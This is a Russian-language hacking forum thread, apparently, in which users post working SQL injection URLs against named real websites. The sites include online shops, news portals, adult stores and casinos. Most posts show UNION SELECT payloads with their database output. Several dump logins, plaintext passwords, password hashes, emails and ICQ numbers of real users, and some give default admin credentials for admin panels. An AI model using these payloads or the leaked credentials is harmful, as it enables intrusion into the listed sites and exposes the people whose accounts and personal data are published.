SQL Инъекции

www.twinind.com

Code:

http://twinind.com/catalog_detail.php?id=-274+union+select+1,2,3,4,5,6,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),8,9,10,11,12,13/*

4.1.14:root@localhost:catalog

www.kelleykreations.com

Code:

http://www.kelleykreations.com/catalog/catalog.php?id=-70+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*

4.0.27-standard:kelleykr_storeus@localhost:kelleyk

www.truelifetaxidermy.com

Code:

http://www.truelifetaxidermy.com/catalog.php?id=-16+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4/*

4.1.14-standard-log:[email protected]:truelifetaxidermycom

www.upeda.org

Code:

http://www.upeda.org/view.php?id=-73+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*

4.1.22-community-nt:upeda@dsiis:upeda

www.ipodpalace.com

Code:

http://www.ipodpalace.com/view.php?ID=-125+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14/*

4.1.22-standard:ipodpala_ipod@localhost:ipodpala_news

 

Code:

http://[COLOR=Olive]adam.fulara.com[/COLOR]/e.php?g=gallery&nr=-33+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4/*  

fulara@localhost::fulara::4.0.12-standard
Есть табличка users, но никаких колонок не смог подобрать...

Code:

http://www.[COLOR=DarkOrange]umka.dp.ua[/COLOR]/price.php?g=-7+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9/*  

umapalata@localhost::umapalata::5.0.27-log
Здесь всё очень удобно выводится))
users->login,passwords,email
довольно много интересных мыл, есть админские от разных сайтов)

 

там двойная авторизация

Code:

http://odin-torg.com/admin/

, если вводить admin:admin попадаем на

Code:

http://odin-torg.com/admin/general_admin/start.php

а там данные от u60555_odin.general_admin, но проверка ip . и кавычка экранируется =\

Code:

'SELECT id FROM general_admin WHERE login = 'логин' AND pass = 'пасс\'/*' AND ip_address = 'твой ip' не может быть выполнена.

 

pechatnick.com


http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,version(),database(),user())/*

5.0.45-log/u8421_2/[email protected]


http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,login,pass,email,icq)+from+users+limit+3000,1/*

логин/пароль/мейл/уин больше 3000 юзеров
chaxter/881515/[email protected]/

 

Code:

http://www.[COLOR=DarkOrange]wollrus.ru[/COLOR]/catalog/zzz.php?b=4&tip=-2+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9/*  

wollrus9@localhost::wollrus9_shvey::4.1.22-log
Ничё не нашёл.

Code:

http://www.[COLOR=DarkOrange]wegcode.be[/COLOR]/wetgrp.php?g=-1+union+select+1,2,3,concat_ws(char(58,58),user(),database(),version()),5,6/*  

wegcode_main@localhost::wegcode_main::4.0.23-standard
Есть таблица admin, но там нашёл только id и name...

 

Да ты профи...
А попробуй так:

P.S.: Ты же сам себя на*бал!
P.P.S:

 

www.easternmarket.net

Code:

http://www.easternmarket.net/index.php?id=fe&fe=-53+union+select+1,concat_ws(0x3,user(),database(),version()),email,phone,5,6+from+market+limit+4,2/*

User: [email protected]
Database: easternm
Version: 5.0.22-Debian_0ubuntu6.06.2-log

Code:

http://www.easternmarket.net/index.php?id=fe&fe=-53+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5,6+from+information_schema.columns/*

 

price.ua

 

intelco1_maxanda@localhostintelco1_intelcom4.1.22-log

[email protected]etikk4.1.20

IOCISONO@LOCALHOSTE-COMMERCE4.0.24_DEBIAN-10SARGE2-LOG

http://www.vfs.com/blog/wp-login.php

 

4.1.21:[email protected]

http://www.frankdelaney.com/work.php?id=13+union+select+1,concat(version(),0x3a,user()),3,4,5,6,7,8/*​

 

HTML:

http://seksmagazin.ru/show/?prod=5016+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13/*

HTML:

http://onlinesexshop.ru/tovar/?id=5167+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13/*

HTML:

http://www.loverland.ru/addbasket.php?action=add&id=-1047+UNION+SELECT+version()/*

HTML:

http://www.comingsoon.net/news/movienews.php?id=-40208+UNION+SELECT+version()/*

 

http://www.itmnews.ru/itmnews.php?s=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/*

4.1.20-lk-log/itmnewsru/itmnewsru@localhost

-----------------------------------------------------------------------------

kafanews.com

http://www.kafanews.com/index.phtml?link=1&nn=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*

5.0.27-log/kafa_news/kafa_news@localhost

http://www.kafanews.com/index.phtml?link=1&nn=-1+union+select+1,concat_ws(0x2F,kto,passwd),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+banka_login+limit+1,1/*

имя/пароль
Юлия Ташкина/>kbz



Другие интересные таблицы:

имя таблицы (столбцы) пример

kasper_login (login,passwd) helena/kbyudbcnbrf
loris_login (login,passwd) admin/lorislogin
forums_user (username,password,email,icq) Natalia/34b5231473658a8da04b80b7f850ea17/[email protected]/210387998
w_klients_affiliates (username,password,email) Nat/bd953afe4994579f871806f408c7ccd3/[email protected]
user (name,pass,mail) root/1/
users (name,pass,email,icq) Максим/adala/[email protected]/
people (name,pass) qwerty/123456

 

Code:

http://www.latek.com.ua/index.php?page=produkt.php&subcat=99+union+select+1,2,3,4,5,id,7,8+from+user/*

тупо не могу подобрать колонки

 

www.bizzz.com

[email protected]:4.1.22-max-log:rank_site8

Поигравшись с лимитом, можно вывести остальных.
__________________________________________
www.awiscz.com

4.1.22-log:awiscz_com:awisc.com@localhost

Админка: www.awiscz.com/admin/
Login: admin
Pass: admin
__________________________________________
www.impresia.ro

4.1.22-standard:impresia_web@localhost:impresia_web
__________________________________________
www.nordicdvd.net

kvernan_oebdvd@localhost:4.1.22-standard:kvernan_kvernan

Присутствует таблица kvernan
__________________________________________
http://videos.baise-porno.net

kabia06@localhost:4.1.11-Debian_4sarge7-log:kabia06_privilege
__________________________________________

Добавлено

Может кому будет интересно (в чем я, собственно, не сомневаюсь)

Покрутите:

 

HTML:

http://www.uprava.org/section.php?id=-34+UNION+SELECT+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7/*

HTML:

http://www.happyland-drink.ru/brands.php?id=-2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

 

HTML:

http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,version(),3,4,5,6,7/*

HTML:

http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,concat(user_id,0x3a,user_name,0x3a,password),3,4,5,6,7+FROM+user+LIMIT+0,1/*

1:semenov:6b19beeaedade171ecc320ddd87f7ae6::dancer

 

4.0.27-standard-log:db93557881:[email protected]

 

2 Lesnoy_chelovek

Code:

http://www.latek.com.ua/index.php?page=produkt.php&subcat=99+union+select+1,2,3,log,5,pas,7,8+from+user/*

 

Пройдёмся по казино.
Пять близнецов штоле? Не могу увидеть где выводится инфа. Ногами не бить- в скулях совсем зелен и несведущь.

HTML:

http://www.casinos-virtuels.net/description-casino.php?id=23+orde r+by+28/*

HTML:

http://www.casino-jeu.net/casino.php?id=54+order+b y+28/*

HTML:

http://www.annuaire-casino.net/casino.php?id=9+or der+by+28/*

HTML:

http://www.01-casino.com/casino.php?id=17+ order+by+28/*

HTML:

http://www.jeu-casino-online.com/casino.php?id=4+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28/*

 

минусенг в параметре поставь и увидишь: